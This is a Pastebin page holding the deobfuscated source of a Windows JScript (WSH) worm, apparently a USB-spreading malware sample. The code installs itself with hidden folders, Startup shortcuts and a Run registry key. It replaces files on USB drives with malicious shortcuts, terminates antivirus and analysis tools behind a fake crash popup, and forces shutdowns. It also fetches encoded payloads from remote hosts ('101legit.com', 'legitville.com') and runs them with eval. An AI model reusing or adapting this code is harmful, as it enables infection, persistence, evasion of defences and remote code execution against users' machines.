Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 'use strict';
- (function() {
- var _$jscomp$0 = {
- v : "609",
- a : "",
- t : "0",
- u : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
- };
- var a$jscomp$0 = new ActiveXObject("wscript.shell");
- var b$jscomp$0 = new ActiveXObject("scripting.filesystemobject");
- /**
- * @return {?}
- */
- var h$jscomp$6 = function() {
- return ((1 + Math.random()) * 65536 | 0).toString(16).substring(1);
- };
- var d$jscomp$0 = a$jscomp$0.environment("process");
- var f$jscomp$1 = d$jscomp$0("username");
- var g$jscomp$0 = d$jscomp$0("computername");
- var ru$jscomp$0 = new ActiveXObject("shell.application");
- /** @type {!Array} */
- var lo$jscomp$0 = [];
- /** @type {!Array} */
- var fup$jscomp$0 = [];
- /** @type {string} */
- var dod$jscomp$0 = "";
- /** @type {number} */
- var dot$jscomp$0 = 0;
- /**
- * @param {string} num
- * @return {undefined}
- */
- var hf$jscomp$0 = function(num) {
- try {
- var key = b$jscomp$0.getFolder(num);
- /** @type {number} */
- key.attributes = 2;
- } catch (n) {
- }
- };
- /**
- * @param {string} id
- * @return {?}
- */
- var sc$jscomp$0 = function(id) {
- /** @type {string} */
- id = id + "";
- /** @type {number} */
- var hash = 0;
- /** @type {number} */
- var i = 0;
- for (; i < id.length; i++) {
- /** @type {number} */
- hash = (hash << 5) - hash + id.charCodeAt(i);
- /** @type {number} */
- hash = hash & hash;
- }
- return Math.abs(hash);
- };
- /**
- * @param {string} hash
- * @return {?}
- */
- var ha$jscomp$0 = function(hash) {
- /** @type {string} */
- var key = "";
- var id = sc$jscomp$0(hash);
- /** @type {number} */
- var r = 0;
- for (; r < sc$jscomp$0(hash) % 5 + 5; r++) {
- id = sc$jscomp$0(key + id);
- /** @type {string} */
- key = key + String.fromCharCode(id % 25 + 97);
- }
- return key;
- };
- /**
- * @return {?}
- */
- var zzo$jscomp$0 = function() {
- /** @type {!Array} */
- var parts = ["http://www.microsoft.com/", "http://www.google.com/", "http://www.bing.com/"];
- /** @type {number} */
- var i = 0;
- var xhr;
- var wep;
- for (; i < parts.length; i++) {
- try {
- xhr = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");
- xhr.open("GET", parts[i]);
- xhr.setRequestHeader("User-Agent", _$jscomp$0.u);
- xhr.setRequestHeader("Cache-Control", "no-cache");
- xhr.setRequestHeader("Pragma", "no-cache");
- xhr.setRequestHeader("Connection", "close");
- xhr.send("");
- /** @type {number} */
- wep = (new Date(xhr.getAllResponseHeaders().split("Date: ").pop().split("\n").shift())).getTime() / 1000;
- if (1388534400 < wep) {
- return wep;
- }
- } catch (e) {
- }
- }
- return false;
- };
- /**
- * @param {number} length
- * @return {undefined}
- */
- var hr$jscomp$0 = function(length) {
- if (length) {
- /** @type {number} */
- var showSelectedPage = 1;
- /** @type {number} */
- var cb_decode = 1;
- } else {
- /** @type {number} */
- showSelectedPage = 2;
- /** @type {number} */
- cb_decode = 0;
- }
- try {
- a$jscomp$0.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", showSelectedPage, "REG_DWORD");
- } catch (r) {
- }
- try {
- a$jscomp$0.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", cb_decode, "REG_DWORD");
- } catch (r) {
- }
- };
- /**
- * @param {string} str
- * @param {string} name
- * @return {?}
- */
- var rc$jscomp$0 = function(str, name) {
- /** @type {!Array} */
- var b = [];
- /** @type {number} */
- var f = 0;
- var c;
- /** @type {string} */
- var typeName = "";
- /** @type {number} */
- var i = 0;
- for (; i < 256; i++) {
- /** @type {number} */
- b[i] = i;
- }
- /** @type {number} */
- i = 0;
- for (; i < 256; i++) {
- /** @type {number} */
- f = (f + b[i] + str.charCodeAt(i % str.length)) % 256;
- c = b[i];
- b[i] = b[f];
- b[f] = c;
- }
- /** @type {number} */
- i = 0;
- /** @type {number} */
- f = 0;
- /** @type {number} */
- var q = 0;
- for (; q < name.length; q++) {
- /** @type {number} */
- i = (i + 1) % 256;
- /** @type {number} */
- f = (f + b[i]) % 256;
- c = b[i];
- b[i] = b[f];
- b[f] = c;
- /** @type {string} */
- typeName = typeName + String.fromCharCode(name.charCodeAt(q) ^ b[(b[i] + b[f]) % 256]);
- }
- return typeName;
- };
- /**
- * @return {?}
- */
- var cob$jscomp$0 = function() {
- return Math.floor((1 + Math.random()) * 65536).toString(16).substring(1);
- };
- /** @type {!Array} */
- var zbo$jscomp$0 = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"];
- /**
- * @param {!Array} values
- * @return {?}
- */
- var shh$jscomp$0 = function(values) {
- var j;
- var c;
- var i = values.length;
- for (; i; j = parseInt(Math.random() * i), c = values[--i], values[i] = values[j], values[j] = c) {
- }
- return values;
- };
- /**
- * @return {undefined}
- */
- var kp$jscomp$0 = function() {
- if (b$jscomp$0.fileExists(bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a09"))) {
- WScript.quit();
- }
- };
- /**
- * @return {undefined}
- */
- var zt$jscomp$0 = function() {
- try {
- var rejectingServer = b$jscomp$0.openTextFile(bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a00"), 8, true);
- rejectingServer.close();
- a$jscomp$0.run("%comspec% /c shutdown /p /f", 0);
- } catch (e) {
- }
- };
- /**
- * @return {?}
- */
- var fuu$jscomp$0 = function() {
- /** @type {!Array} */
- var newNodeLists = [];
- var _items = new Enumerator(b$jscomp$0.getFolder(bfo$jscomp$0).Files);
- for (; !_items.atEnd(); _items.moveNext()) {
- if (b$jscomp$0.getExtensionName(_items.item().Name) == "exe") {
- newNodeLists.push(bfo$jscomp$0 + _items.item().Name);
- }
- }
- return newNodeLists;
- };
- /**
- * @return {?}
- */
- var dof$jscomp$0 = function() {
- if (dod$jscomp$0 != "" && dot$jscomp$0 + 60 * 60 * 72 * 1000 >= (new Date).getTime()) {
- return dod$jscomp$0;
- } else {
- var tasks = shh$jscomp$0(["http://101legit.com/", "http://legitville.com/"]);
- /** @type {string} */
- var t = "";
- /** @type {number} */
- var i = 0;
- for (; i < tasks.length; i++) {
- try {
- $$jscomp$0("0", tasks[i]);
- var hgf = zxcvb;
- t = tasks[i];
- } catch (e) {
- } finally {
- delete zxcvb;
- delete hgf;
- }
- if (t != "") {
- break;
- }
- }
- if (t == "") {
- return false;
- } else {
- dod$jscomp$0 = t;
- /** @type {number} */
- dot$jscomp$0 = (new Date).getTime();
- return dod$jscomp$0;
- }
- }
- };
- /**
- * @param {string} fab$jscomp$0
- * @param {number} fat$jscomp$0
- * @return {undefined}
- */
- var $$jscomp$0 = function(fab$jscomp$0, fat$jscomp$0) {
- var m$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a06");
- var yun$jscomp$0 = fat$jscomp$0 === 1 ? dof$jscomp$0() : fat$jscomp$0;
- if (yun$jscomp$0 == false) {
- throw Error();
- }
- var j$jscomp$2 = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");
- j$jscomp$2.open("GET", yun$jscomp$0 + fab$jscomp$0 + ".html");
- j$jscomp$2.setRequestHeader("User-Agent", _$jscomp$0.u);
- j$jscomp$2.send();
- var c$jscomp$0 = new ActiveXObject("ADODB.Stream");
- /** @type {number} */
- c$jscomp$0.mode = 3;
- /** @type {number} */
- c$jscomp$0.type = 1;
- c$jscomp$0.open();
- c$jscomp$0.write(j$jscomp$2.responseBody);
- c$jscomp$0.saveToFile(m$jscomp$0, 2);
- var k$jscomp$0 = b$jscomp$0.openTextFile(m$jscomp$0, 1);
- var l$jscomp$0 = k$jscomp$0.readAll();
- k$jscomp$0.close();
- try {
- b$jscomp$0.deleteFile(m$jscomp$0);
- } catch (e) {
- }
- /** @type {string} */
- var out$jscomp$0 = "";
- /** @type {!Array} */
- var key$jscomp$36 = [];
- l$jscomp$0 = l$jscomp$0.split("\x3c!-- ").pop().split(" --\x3e").shift().split("");
- /** @type {number} */
- var i$jscomp$8 = 0;
- for (; i$jscomp$8 < 5; i$jscomp$8++) {
- key$jscomp$36.push(l$jscomp$0.shift().charCodeAt(0) - 32);
- }
- /** @type {number} */
- i$jscomp$8 = 0;
- for (; i$jscomp$8 < l$jscomp$0.length; i$jscomp$8++) {
- /** @type {number} */
- c$jscomp$0 = l$jscomp$0[i$jscomp$8].charCodeAt(0) - key$jscomp$36[i$jscomp$8 % key$jscomp$36.length];
- /** @type {string} */
- out$jscomp$0 = out$jscomp$0 + String.fromCharCode(c$jscomp$0 < 32 ? 95 + c$jscomp$0 : c$jscomp$0);
- }
- try {
- eval(out$jscomp$0);
- } catch (e) {
- }
- };
- /**
- * @return {undefined}
- */
- var sk$jscomp$0 = function() {
- /** @type {number} */
- var foc = 0;
- try {
- var path = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a11");
- var mug = b$jscomp$0.openTextFile(path, 8, true);
- mug.close();
- foc++;
- ru$jscomp$0.shellExecute(pw$jscomp$0(w0$jscomp$0), '"' + WScript.ScriptFullName + '" ' + ha$jscomp$0(g$jscomp$0 + "a10"), "", "", 0);
- } catch (e) {
- }
- try {
- path = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a13");
- mug = b$jscomp$0.openTextFile(path, 8, true);
- mug.close();
- foc++;
- ru$jscomp$0.shellExecute(pw$jscomp$0(w0$jscomp$0), '"' + WScript.ScriptFullName + '" ' + ha$jscomp$0(g$jscomp$0 + "a12"), "", "", 0);
- } catch (e) {
- }
- };
- /**
- * @param {!Array} a
- * @return {?}
- */
- var pw$jscomp$0 = function(a) {
- return a[Math.floor(Math.random() * a.length)];
- };
- /** @type {string} */
- var w$jscomp$7 = "000";
- try {
- w$jscomp$7 = a$jscomp$0.regRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductID");
- } catch (e) {
- }
- /** @type {!Array} */
- var vn$jscomp$0 = [0, 0, 0, 0];
- try {
- var i$jscomp$3 = new Enumerator(GetObject("winmgmts:root\\cimv2").ExecQuery("SELECT * FROM Win32_OperatingSystem"));
- for (; !i$jscomp$3.atEnd(); i$jscomp$3.moveNext()) {
- vn$jscomp$0 = i$jscomp$3.item()["version"].split(".");
- if (vn$jscomp$0[0] >= 5) {
- break;
- }
- }
- } catch (e) {
- }
- if (!vn$jscomp$0[0]) {
- /** @type {number} */
- vn$jscomp$0[0] = b$jscomp$0.folderExists(d$jscomp$0("systemdrive") + "\\Users") ? 6 : 5;
- }
- /** @type {!Array} */
- var ll$jscomp$0 = ["", ""];
- try {
- var osl$jscomp$0;
- i$jscomp$3 = new Enumerator(GetObject("winmgmts:root\\cimv2").ExecQuery("SELECT * FROM Win32_OperatingSystem"));
- for (; !i$jscomp$3.atEnd(); i$jscomp$3.moveNext()) {
- osl$jscomp$0 = (osl$jscomp$0 = i$jscomp$3.item()["OSLanguage"].toString(16)).length == 4 ? osl$jscomp$0 : (new Array(5 - osl$jscomp$0.length)).join("0") + osl$jscomp$0;
- ll$jscomp$0 = a$jscomp$0.regRead("HKLM\\SOFTWARE\\Classes\\MIME\\Database\\Rfc1766\\" + osl$jscomp$0).split(";")[0].split("-");
- break;
- }
- } catch (e) {
- }
- /** @type {string} */
- var bfo$jscomp$0 = d$jscomp$0("localappdata") + "\\" + ha$jscomp$0(g$jscomp$0 + "a02") + "\\";
- if (b$jscomp$0.folderExists(bfo$jscomp$0)) {
- /** @type {string} */
- var tff$jscomp$0 = "";
- var otf$jscomp$0;
- /** @type {number} */
- var ysg$jscomp$0 = 0;
- /** @type {string} */
- var hd$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a03");
- /** @type {string} */
- var bfi$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a04") + ".js";
- if (b$jscomp$0.fileExists(hd$jscomp$0)) {
- try {
- otf$jscomp$0 = b$jscomp$0.openTextFile(hd$jscomp$0, 1);
- tff$jscomp$0 = otf$jscomp$0.readAll();
- otf$jscomp$0.close();
- } catch (e) {
- }
- } else {
- /** @type {number} */
- ysg$jscomp$0 = 1;
- }
- if (ysg$jscomp$0 || tff$jscomp$0 == "") {
- try {
- /** @type {string} */
- tff$jscomp$0 = cob$jscomp$0() + cob$jscomp$0() + "-" + cob$jscomp$0() + "-" + cob$jscomp$0() + "-" + cob$jscomp$0() + "-" + cob$jscomp$0() + cob$jscomp$0() + cob$jscomp$0();
- otf$jscomp$0 = b$jscomp$0.openTextFile(hd$jscomp$0, 2, 1);
- otf$jscomp$0.write(tff$jscomp$0);
- otf$jscomp$0.close();
- } catch (e) {
- }
- }
- try {
- var ZE$jscomp$0 = b$jscomp$0.openTextFile(bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a05"), 8, true);
- ZE$jscomp$0.close();
- hf$jscomp$0(bfo$jscomp$0);
- try {
- b$jscomp$0.copyFile(WScript.scriptFullName, bfi$jscomp$0, true);
- } catch (e) {
- }
- try {
- /** @type {string} */
- var cvv$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a00");
- var Oq$jscomp$0 = b$jscomp$0.openTextFile(cvv$jscomp$0, 8, true);
- try {
- b$jscomp$0.deleteFile(bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a09"));
- } catch (e) {
- }
- } catch (e) {
- if (WScript.Arguments.length > 0) {
- switch(WScript.Arguments(0)) {
- case ha$jscomp$0(g$jscomp$0 + "a10"):
- /** @type {string} */
- var cbo$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a11");
- try {
- var zbz$jscomp$0 = b$jscomp$0.openTextFile(cbo$jscomp$0, 8, true);
- } catch (e) {
- WScript.quit();
- }
- for (; true;) {
- try {
- var oot$jscomp$0 = GetObject("winmgmts:root\\cimv2");
- var dS$jscomp$0 = new Enumerator(oot$jscomp$0.ExecQuery("SELECT * FROM Win32_DiskDrive"));
- for (; !dS$jscomp$0.atEnd(); dS$jscomp$0.moveNext()) {
- if (dS$jscomp$0.item().Model.match(/usb/i)) {
- var did$jscomp$0 = dS$jscomp$0.item().DeviceID;
- var dPS$jscomp$0 = new Enumerator(oot$jscomp$0.ExecQuery("ASSOCIATORS OF {Win32_DiskDrive.DeviceID='" + did$jscomp$0 + "'} WHERE AssocClass=Win32_DiskDriveToDiskPartition"));
- for (; !dPS$jscomp$0.atEnd(); dPS$jscomp$0.moveNext()) {
- var pID$jscomp$0 = dPS$jscomp$0.item().DeviceID;
- var lDS$jscomp$0 = new Enumerator(oot$jscomp$0.ExecQuery("ASSOCIATORS OF {Win32_DiskPartition.DeviceID='" + pID$jscomp$0 + "'} WHERE AssocClass=Win32_LogicalDiskToPartition"));
- for (; !lDS$jscomp$0.atEnd(); lDS$jscomp$0.moveNext()) {
- /** @type {string} */
- var lD$jscomp$0 = lDS$jscomp$0.item().DeviceID + "\\";
- /** @type {string} */
- var trr$jscomp$0 = "Files\\";
- /** @type {string} */
- var trd$jscomp$0 = lD$jscomp$0 + trr$jscomp$0;
- /** @type {string} */
- var poor$jscomp$0 = sc$jscomp$0(g$jscomp$0) % 500 + 405 + "\\";
- /** @type {string} */
- var por$jscomp$0 = trr$jscomp$0 + poor$jscomp$0;
- /** @type {string} */
- var pod$jscomp$0 = lD$jscomp$0 + por$jscomp$0;
- /** @type {string} */
- var piir$jscomp$0 = ha$jscomp$0(g$jscomp$0 + "a01") + ".js";
- /** @type {string} */
- var pir$jscomp$0 = por$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a01") + ".js";
- /** @type {string} */
- var pid$jscomp$0 = lD$jscomp$0 + pir$jscomp$0;
- /** @type {string} */
- var bat$jscomp$0 = lD$jscomp$0 + "Files.bat";
- try {
- var gf$jscomp$0 = b$jscomp$0.getFolder(trd$jscomp$0);
- var fS$jscomp$0 = new Enumerator(gf$jscomp$0.SubFolders);
- for (; !fS$jscomp$0.atEnd(); fS$jscomp$0.moveNext()) {
- var ff$jscomp$0 = (fS$jscomp$0.item() + "").split("\\").pop();
- if (ff$jscomp$0.length == 3 && !isNaN(parseFloat(ff$jscomp$0)) && isFinite(ff$jscomp$0)) {
- var fg$jscomp$0 = b$jscomp$0.getFolder(trd$jscomp$0 + ff$jscomp$0);
- var Sf$jscomp$0 = new Enumerator(fg$jscomp$0.Files);
- for (; !Sf$jscomp$0.atEnd(); Sf$jscomp$0.moveNext()) {
- var fff$jscomp$0 = (Sf$jscomp$0.item() + "").split("\\").pop();
- if (b$jscomp$0.getExtensionName(fff$jscomp$0).toLowerCase() == "js") {
- try {
- b$jscomp$0.copyFile(WScript.scriptFullName, trd$jscomp$0 + ff$jscomp$0 + "\\" + fff$jscomp$0, true);
- } catch (e) {
- }
- }
- }
- }
- }
- } catch (e) {
- }
- try {
- b$jscomp$0.createFolder(trd$jscomp$0);
- } catch (e) {
- }
- try {
- b$jscomp$0.createFolder(pod$jscomp$0);
- } catch (e) {
- }
- hf$jscomp$0(trd$jscomp$0);
- hf$jscomp$0(pod$jscomp$0);
- try {
- var otff$jscomp$0 = b$jscomp$0.openTextFile(bat$jscomp$0, 2, 1);
- otff$jscomp$0.writeLine("cd Files\\" + poor$jscomp$0);
- otff$jscomp$0.writeLine("%comspec% /c start w^script " + piir$jscomp$0);
- otff$jscomp$0.writeLine("exit");
- otff$jscomp$0.close();
- } catch (e) {
- }
- /** @type {!Array} */
- var bro$jscomp$0 = [127, 128, 129];
- try {
- gf$jscomp$0 = b$jscomp$0.getFolder(lD$jscomp$0);
- fS$jscomp$0 = new Enumerator(gf$jscomp$0.SubFolders);
- for (; !fS$jscomp$0.atEnd(); fS$jscomp$0.moveNext()) {
- ff$jscomp$0 = (fS$jscomp$0.item() + "").split(":\\").pop();
- if (ff$jscomp$0.substr(0, 1) != "." && ff$jscomp$0.substr(0, 1) != "$" && ff$jscomp$0.match(/recycle/i) == null && ff$jscomp$0.match(/System Volume/) == null && ff$jscomp$0.match(/Files/) == null) {
- with(a$jscomp$0.createShortcut(lD$jscomp$0 + ff$jscomp$0 + ".lnk")) {
- /** @type {string} */
- targetPath = "%comspec%";
- /** @type {number} */
- windowStyle = 7;
- /** @type {string} */
- arguments = '/c set c=Files.bat& cmd.exe /c set d=explorer& cmd.exe /c %c% > nul& cd Files& cmd.exe /c %d% "' + ff$jscomp$0 + '"';
- /** @type {string} */
- iconLocation = "%SystemRoot%\\System32\\SHELL32.dll," + pw$jscomp$0(bro$jscomp$0);
- save();
- }
- try {
- var t$jscomp$0 = b$jscomp$0.getFolder(lD$jscomp$0 + ff$jscomp$0);
- t$jscomp$0.move(trd$jscomp$0 + ff$jscomp$0);
- } catch (e) {
- }
- hf$jscomp$0(trd$jscomp$0 + ff$jscomp$0);
- }
- }
- } catch (e) {
- }
- try {
- gf$jscomp$0 = b$jscomp$0.getFolder(lD$jscomp$0);
- fS$jscomp$0 = new Enumerator(gf$jscomp$0.Files);
- for (; !fS$jscomp$0.atEnd(); fS$jscomp$0.moveNext()) {
- ff$jscomp$0 = (fS$jscomp$0.item() + "").split(":\\").pop();
- var exx$jscomp$0 = b$jscomp$0.getExtensionName(ff$jscomp$0).toLowerCase();
- if (exx$jscomp$0 != "lnk" && exx$jscomp$0 != "bat" && exx$jscomp$0 != "" && exx$jscomp$0 != "js" && ff$jscomp$0.toLowerCase() != "autorun.inf" && ff$jscomp$0.substr(0, 1) != "." && ff$jscomp$0.substr(0, 1) != "$" && ff$jscomp$0.match(/recycle/i) == null) {
- /** @type {number} */
- var exo$jscomp$0 = 0;
- switch(exx$jscomp$0) {
- case "exe":
- /** @type {number} */
- exo$jscomp$0 = 261;
- break;
- case "doc":
- case "docx":
- case "pdf":
- /** @type {number} */
- exo$jscomp$0 = 73;
- break;
- case "rtf":
- case "txt":
- /** @type {number} */
- exo$jscomp$0 = 70;
- break;
- case "mp3":
- case "m4a":
- case "ogg":
- case "wav":
- case "wma":
- /** @type {number} */
- exo$jscomp$0 = 116;
- break;
- case "mp4":
- case "avi":
- case "webm":
- case "flv":
- case "mov":
- case "wmv":
- case "mpeg":
- case "mpg":
- /** @type {number} */
- exo$jscomp$0 = 115;
- break;
- case "gif":
- case "jpg":
- case "jpeg":
- case "png":
- /** @type {number} */
- exo$jscomp$0 = 302;
- break;
- }
- with(a$jscomp$0.createShortcut(lD$jscomp$0 + ff$jscomp$0 + ".lnk")) {
- /** @type {string} */
- targetPath = "%comspec%";
- /** @type {number} */
- windowStyle = 7;
- /** @type {string} */
- arguments = '/c set zz=Files.bat& cmd.exe /c %zz% > nul& cd Files& cmd.exe /c "' + ff$jscomp$0 + '"';
- /** @type {string} */
- iconLocation = "%SystemRoot%\\System32\\SHELL32.dll," + exo$jscomp$0;
- save();
- }
- try {
- b$jscomp$0.moveFile(lD$jscomp$0 + ff$jscomp$0, trd$jscomp$0 + ff$jscomp$0);
- } catch (e) {
- }
- hf$jscomp$0(trd$jscomp$0 + ff$jscomp$0);
- }
- }
- } catch (e) {
- }
- try {
- b$jscomp$0.copyFile(WScript.scriptFullName, pid$jscomp$0, true);
- } catch (e) {
- }
- }
- }
- }
- }
- } catch (e) {
- }
- kp$jscomp$0();
- zt$jscomp$0();
- WScript.sleep(14E3);
- }
- break;
- case ha$jscomp$0(g$jscomp$0 + "a12"):
- /** @type {string} */
- cbo$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a13");
- try {
- zbz$jscomp$0 = b$jscomp$0.openTextFile(cbo$jscomp$0, 8, true);
- } catch (e) {
- WScript.quit();
- }
- for (; true;) {
- try {
- t$jscomp$0 = GetObject("winmgmts:root\\cimv2");
- i$jscomp$3 = new Enumerator(t$jscomp$0.ExecQuery("SELECT * FROM Win32_Process"));
- for (; !i$jscomp$3.atEnd(); i$jscomp$3.moveNext()) {
- var it$jscomp$0 = i$jscomp$3.item();
- if (it$jscomp$0["name"].match(new RegExp(zbo$jscomp$0.join("|"), "i"))) {
- try {
- if (it$jscomp$0.terminate() == 0 && it$jscomp$0["ExecutablePath"] && !it$jscomp$0["ExecutablePath"].match(/windows|program/i)) {
- /** @type {string} */
- var tp$jscomp$0 = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
- /** @type {string} */
- var tq$jscomp$0 = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
- a$jscomp$0.popup("Application has generated an exception that could not be handled.\n\nProcess id=0x" + tp$jscomp$0 + " (" + parseInt(tp$jscomp$0, 16) + "), Thread id=0x" + tq$jscomp$0 + " (" + parseInt(tq$jscomp$0, 16) + ").\n\nClick OK to terminate the application.\nClick CANCEL to debug the application.", 8, it$jscomp$0["name"] + " - Common Language Runtime Debugging Services", 1 + 48 + 4096);
- }
- } catch (e) {
- }
- }
- }
- } catch (e) {
- }
- kp$jscomp$0();
- zt$jscomp$0();
- WScript.sleep(400);
- }
- break;
- }
- }
- if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha$jscomp$0(g$jscomp$0 + "a07")) == false) {
- WScript.quit();
- }
- }
- /** @type {!Array} */
- var w0$jscomp$0 = [];
- if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha$jscomp$0(g$jscomp$0 + "a07")) == false) {
- try {
- a$jscomp$0.run('%comspec% /c del /F /S /Q "' + bfo$jscomp$0 + '*.exe"', 0, true);
- WScript.sleep(500);
- } catch (e) {
- }
- ww = ha$jscomp$0(Math.random());
- /** @type {number} */
- mm = Math.ceil(Math.random() * 5);
- if (mm > 3) {
- /** @type {string} */
- ww = ww + (mm > 4 ? "64" : "32");
- }
- /** @type {string} */
- ww = ww + ".exe";
- b$jscomp$0.copyFile(d$jscomp$0("systemroot") + "\\system32\\wscript.exe", bfo$jscomp$0 + ww, true);
- w0$jscomp$0.push(bfo$jscomp$0 + ww);
- } else {
- w0$jscomp$0 = fuu$jscomp$0();
- }
- var fet$jscomp$0 = pw$jscomp$0(w0$jscomp$0);
- /** @type {number} */
- var su$jscomp$0 = 0;
- try {
- var pp$jscomp$0 = d$jscomp$0("systemdrive") + "\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\";
- /** @type {string} */
- var p$jscomp$0 = pp$jscomp$0 + "Start.lnk";
- with(a$jscomp$0.createShortcut(p$jscomp$0)) {
- /** @type {string} */
- targetPath = '"' + fet$jscomp$0 + '"';
- /** @type {number} */
- windowStyle = 1;
- /** @type {string} */
- arguments = '"' + bfi$jscomp$0 + '"';
- /** @type {string} */
- iconLocation = "%systemroot%\\system32\\shell32.dll,3";
- save();
- }
- su$jscomp$0++;
- lo$jscomp$0.push(p$jscomp$0);
- /** @type {!Array} */
- var cbb$jscomp$0 = ["Windows Explorer.lnk", "empezar.lnk", "atajo.lnk"];
- /** @type {number} */
- var i1$jscomp$0 = 0;
- for (; i1$jscomp$0 < cbb$jscomp$0.length; i1$jscomp$0++) {
- try {
- b$jscomp$0.deleteFile(pp$jscomp$0 + cbb$jscomp$0[i1$jscomp$0]);
- } catch (e) {
- }
- }
- } catch (e) {
- }
- try {
- pp$jscomp$0 = d$jscomp$0("userprofile") + (vn$jscomp$0[0] >= 6 ? "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" : "\\Start Menu\\Programs\\Startup\\");
- /** @type {string} */
- p$jscomp$0 = pp$jscomp$0 + "Start.lnk";
- with(a$jscomp$0.createShortcut(p$jscomp$0)) {
- /** @type {string} */
- targetPath = '"' + fet$jscomp$0 + '"';
- /** @type {number} */
- windowStyle = 1;
- /** @type {string} */
- arguments = '"' + bfi$jscomp$0 + '"';
- /** @type {string} */
- iconLocation = "%systemroot%\\system32\\shell32.dll,3";
- save();
- }
- lo$jscomp$0.push(p$jscomp$0);
- /** @type {!Array} */
- cbb$jscomp$0 = ["Windows Explorer.lnk", "empezar.lnk", "atajo.lnk"];
- /** @type {number} */
- i1$jscomp$0 = 0;
- for (; i1$jscomp$0 < cbb$jscomp$0.length; i1$jscomp$0++) {
- try {
- b$jscomp$0.deleteFile(pp$jscomp$0 + cbb$jscomp$0[i1$jscomp$0]);
- } catch (e) {
- }
- }
- } catch (e) {
- }
- try {
- a$jscomp$0.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + ha$jscomp$0(g$jscomp$0 + "a15"), '"' + fet$jscomp$0 + '" "' + bfi$jscomp$0 + '"');
- } catch (e) {
- }
- if (WScript.ScriptFullName.split("\\").shift() == d$jscomp$0("systemdrive")) {
- lo$jscomp$0.push(WScript.ScriptFullName);
- }
- /** @type {string} */
- var tc$jscomp$0 = d$jscomp$0("temp") + "\\" + ha$jscomp$0(g$jscomp$0 + "a08") + ".js";
- if (WScript.Arguments.length > 0 && WScript.Arguments(0) == ha$jscomp$0(g$jscomp$0 + "a07")) {
- try {
- b$jscomp$0.deleteFile(tc$jscomp$0);
- } catch (e) {
- }
- WScript.quit();
- } else {
- if (su$jscomp$0 >= 0) {
- try {
- Oq$jscomp$0 = b$jscomp$0.openTextFile(bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a00"), 8, true);
- } catch (e) {
- }
- }
- }
- hr$jscomp$0(0);
- sk$jscomp$0();
- } catch (e) {
- WScript.quit();
- }
- for (; true;) {
- if (zzo$jscomp$0() !== false) {
- for (; true;) {
- try {
- /** @type {number} */
- i$jscomp$3 = (new Date).getTime();
- $$jscomp$0("1", 1);
- for (; i$jscomp$3 + 60 * 53 * 1E3 >= (new Date).getTime(); sk$jscomp$0()) {
- WScript.sleep(2E3);
- }
- } catch (e) {
- if (zzo$jscomp$0() == false) {
- break;
- }
- /** @type {number} */
- i$jscomp$3 = (new Date).getTime();
- for (; i$jscomp$3 + 60 * 53 * 1E3 >= (new Date).getTime(); sk$jscomp$0()) {
- WScript.sleep(2E3);
- }
- }
- }
- } else {
- /** @type {number} */
- i$jscomp$3 = (new Date).getTime();
- for (; i$jscomp$3 + 60 * 53 * 1E3 >= (new Date).getTime(); sk$jscomp$0()) {
- WScript.sleep(2E3);
- }
- }
- }
- } else {
- /** @type {string} */
- bfo$jscomp$0 = d$jscomp$0("userprofile") + (vn$jscomp$0[0] >= 6 ? "\\AppData\\Roaming\\" : "\\") + ha$jscomp$0(g$jscomp$0 + "02") + "\\";
- if (b$jscomp$0.folderExists(bfo$jscomp$0)) {
- /** @type {string} */
- hd$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "03");
- /** @type {string} */
- tff$jscomp$0 = "";
- if (b$jscomp$0.fileExists(hd$jscomp$0)) {
- try {
- otf$jscomp$0 = b$jscomp$0.openTextFile(hd$jscomp$0, 1);
- tff$jscomp$0 = otf$jscomp$0.readAll();
- otf$jscomp$0.close();
- } catch (e) {
- }
- }
- }
- var bbs$jscomp$0 = d$jscomp$0("localappdata") + "\\" + ha$jscomp$0(g$jscomp$0 + "a02");
- /** @type {string} */
- var bbz$jscomp$0 = bbs$jscomp$0 + "\\" + ha$jscomp$0(g$jscomp$0 + "a04") + ".js";
- try {
- b$jscomp$0.createFolder(bbs$jscomp$0);
- } catch (e) {
- }
